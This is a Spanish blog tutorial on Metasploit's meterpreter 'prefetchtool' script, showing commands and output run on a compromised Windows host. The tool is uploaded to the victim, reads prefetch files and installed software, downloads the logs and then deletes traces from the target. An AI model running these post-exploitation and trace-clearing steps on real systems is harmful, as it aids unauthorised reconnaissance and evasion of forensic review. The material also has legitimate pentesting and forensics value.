metasploit, prefetchtool module

Windows por defecto cada vez que arrancas un programa crea un pequeño fichero .pf (prefetch) que contiene toda la información relativa al mismo, uso de aplicaciones, librerías, ficheros empleados, etc. Estos archivos resultan de gran utilidad a la hora de realizar un análisis en profundidad del equipo, ya que ofrecen la posibilidad de conocer el último estado en el que se encontraba el equipo. La contra, es que para un atacante, toda esta información también es muy valiosa. Por lo tanto, cuando un atacante accede al equipo, puede ir a %%windir%%\Prefetch, carpeta predefinidad de los ficheros .pf y buscar ahí mucha información. Sin embargo si estamos dentro de un equipo empleando metasploit y con el intérprete meterpreter, éste trae un módulo que realiza dicha funcionalidad: prefetchtool.
Una vez estemos dentro de la máquina atacada, únicamente hay que ejecutar el módulo prefetchtool, tal como sigue,
meterpreter> run prefetchtool -h
[*] Prefetch-tool Meterpreter Script

OPTIONS:

   -c       Disable SHA1/MD5 checksum
   -h       Help menu.
   -i       Perform lookup for software name
   -l       Download Prefetch Folder Analysis Log
   -p       List Installed Programs
   -x #     Top x Accessed Executables (Based on Prefetch folder)
Al ejecutarlo con la opción -h, muestra el menú aquí escrito. La forma de ejecutarse es muy sencilla, ya que este módulo no tiene mayor complicación. Si no existe en local, se descarga la última versión disponible de la red, luego la sube al equipo de la víctima para posteriormente extraer la información. Dicha información se puede extraer en tiempo real o bien descargarla a local para un posterior análisis más minucioso. Vamos a ver a prefetchtool en funcionamiento.
meterpreter> run prefetchtool
[*] No local copy of prefetch.exe, downloading from the internet...
[*] Downloaded prefetch.exe to /opt/framework/msf3/data/prefetch.exe
[*] Running Prefetch-tool script...
[*] Uploading Prefetch-tool for analyzing Prefetch folder...
[*] Prefetch-tool uploaded as C:\WINDOWS\TEMP\09447.exe
[*] OUT> 43 Prefetch Files Found
[*] OUT> Analyzing 1 of 43 files
[*] OUT> Filename:  chrome.exe-16185b96.pf
[*] OUT> MD5:   3d28738ee7a72c458d896837be5f8fc1
[*] OUT> SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
[*] OUT> Last accessed time: Mon Jul 30 15:52:08 2012
[*] OUT> Last modified date: Mon Jul 30 16:52:08 2012
[*] OUT> File creation date: Mon May 18 16:09:55 2009
[*] OUT> Total number of runs: 110
[*] OUT> 
[*] OUT> Analyzing 2 of 43 files
[*] OUT> Filename:  chrome.exe-16185b99.pf
[*] OUT> MD5:   8caf984cca4bf018cf9e4fc30f6fae84
[*] OUT> SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
[*] OUT> Last accessed time: Mon Jul 30 15:52:27 2012
[*] OUT> Last modified date: Mon Jul 30 16:52:37 2012
[*] OUT> File creation date: Fri Jan 21 10:42:52 2011
[*] OUT> Total number of runs: 255
[*] OUT> 
[*] OUT> Analyzing 3 of 43 files
...
Si ahora no interesa descargar la información que se extrae del equipo a local, simplemente con la opción -l lo realizará automáticamente,
meterpreter> run prefetchtool -l
[*] Checking for an updated copy of prefetch.exe..
[*] Running Prefetch-tool script...
[*] Uploading Prefetch-tool for analyzing Prefetch folder...
[*] Prefetch-tool uploaded as C:\WINDOWS\TEMP\63263.exe
[*] OUT> 43 Prefetch Files Found
....
 Clearing prefetch-tool prefetch entry ...
[*] [*] Saving prefetch logs to /root/.msf4/logs/prefetch/192.168.1.35-20120811.5054.log...
[*] [*] Deleting log file from target...
Y un ejemplo final de uso es poder sacar un informe de software instalado en la máquina (opción -p).
meterpreter> run prefetchtool -p
[*] Checking for an updated copy of prefetch.exe..
[*] IBMStorageManagerProfiler Server            (Version: 4.9.6)
[*] Juniper Networks Network Connect 7.1.7      (Version: 7.1.7.20581)
[*] Windows Installer 3.1 (KB893803)         (Version: 3.1)
[*] Actualización para Windows XP (KB898461)    (Version: 1)
[*] Hotfix for Windows XP (KB915865)            (Version: 10)
[*] Mozilla Firefox 13.0.1 (x86 es-ES)          (Version: 13.0.1)
[*] Mozilla Maintenance Service                 (Version: 13.0.1)
[*] Picasa 3                                    (Version: 3.8)
[*] VLC media player 1.1.8                      (Version: 1.1.8)
[*] Windows Imaging Component                   (Version: 3.0.0.0)
[*] WinSCP 4.3.2                                (Version: 4.3.2)
[*] MSXML 6.0 Parser (KB933579)                 (Version: 6.10.1200.0)
[*] Microsoft .NET Framework 3.5                (Version: 3.5.21022)
[*] WebFldrs XP                                 (Version: 9.50.6513)
[*] Visual Studio.NET Baseline - Spanish (Version: 7.1.3088)
[*] Microsoft Office Professional Edition 2003 (Version: 11.0.7969.0)
[*] Microsoft .NET Framework 2.0 Service Pack 1 (Version: 2.1.21022)
[*] Microsoft FrontPage Client - Spanish (Version: 7.00.9209)


No hay comentarios :

Publicar un comentario

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios